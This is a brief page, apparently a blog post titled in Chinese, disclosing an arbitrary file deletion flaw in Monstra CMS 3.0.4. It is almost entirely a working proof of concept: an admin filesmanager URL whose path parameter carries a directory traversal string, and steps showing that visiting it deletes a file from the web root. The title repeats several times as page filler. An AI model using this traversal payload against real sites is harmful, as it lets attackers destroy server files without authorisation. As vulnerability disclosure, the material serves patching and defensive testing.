monstra 3.0.4 任意文件删除

分类: 文章 • 2022-09-14 08:36:35

monstra 3.0.4 任意文件删除

Vulnerable URL：http://127.0.0.1/monstra-3.0.4/admin/index.php?id=filesmanager&delete_file=1.txt&path=uploads/.......//./.......//./&token=7514f1bfccba396c26a9b80341db814ea505d80a

touch 1.txt in /var/www/html/monstra-3.0.4/

visit url：http://172.16.173.238/monstra-3.0.4/admin/index.php?id=filesmanager&delete_file=1.txt&path=uploads/.......//./.......//./&token=7514f1bfccba396c26a9b80341db814ea505d80a

the 1.txt will delete

monstra 3.0.4 任意文件删除

monstra 3.0.4 任意文件删除

monstra 3.0.4 任意文件删除

相关推荐